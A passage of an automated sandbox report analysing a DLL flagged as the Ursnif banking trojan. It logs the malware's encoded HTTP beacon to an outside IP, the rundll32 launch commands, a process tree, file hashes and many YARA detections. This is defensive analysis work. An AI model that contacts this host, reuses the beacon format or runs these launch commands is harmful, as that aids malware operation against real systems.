                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        7192.168.2.54982831.214.157.18780C:\Windows\System32\loaddll32.exe
                        TimestampkBytes transferredDirectionData
                        Jan 26, 2022 17:06:38.188649893 CET18611OUTGET /drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: 31.214.157.187
                        Jan 26, 2022 17:06:38.456873894 CET18611INHTTP/1.1 404 Not Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 26 Jan 2022 16:06:38 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 548
                        Connection: keep-alive
                        Vary: Accept-Encoding
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:17:03:03
                        Start date:26/01/2022
                        Path:C:\Windows\System32\loaddll32.exe
                        Wow64 process (32bit):true
                        Commandline:loaddll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll"
                        Imagebase:0x8b0000
                        File size:116736 bytes
                        MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high

                        General

                        Target ID:1
                        Start time:17:03:04
                        Start date:26/01/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                        Imagebase:0x150000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:3
                        Start time:17:03:04
                        Start date:26/01/2022
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                        Imagebase:0x1360000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high

                        General

                        Target ID:7
                        Start time:17:03:07
                        Start date:26/01/2022
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684
                        Imagebase:0x930000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Disassembly

                        No disassembly